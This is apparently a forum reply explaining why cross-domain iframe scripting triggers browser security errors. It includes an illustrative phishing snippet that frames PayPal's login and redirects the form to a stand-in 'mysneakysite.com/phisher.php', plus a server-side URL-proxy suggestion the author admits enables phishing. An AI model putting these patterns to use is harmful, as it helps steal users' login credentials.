[HTML]onClick="document.myform2.mysession.value=window.f rames['ifrm'].document.forms['frm_product'].elements['sessiontime'].value">[/HTML]
I think I understand why you are getting security errors with this statement.
Suppose you created a website that looked something like this:
-
<html>
-
<iframe id="thePfhrame" src="http://www.paypal.com/login"></iframe>
-
<script type="text/javascript">
-
document.getElementById('thePfhrame').document.forms[0].action = 'http://mysneakysite.com/phisher.php';
-
</script>
-
</html>
-
Assuming that the first form on paypal.com/login is the login form, you can see how somebody might set up a pretty convincing phishing page. Even if you right-click on the [frame] and select "show source", you'll see the source for the original PayPal login page.
In order to be able to modify the contents of your iframe, you'd have to set it up so that it loads a page from the same domain as its parent.
My recommendation would be to load the target page on the server side and output it, like this:
- <iframe src="http://mysite.com/redirect.php?url=www.somesite.com%2Fpath%2Fto%2Fthe%2Fpage.ext"></iframe>
redirect.php:
[EDIT: Of course, you could then abuse this in the example above by changing the form's source to http: //mysite.com/redirect.php?url=www.paypal.com%2Flogin. But smart Users will check their location bar anyway.]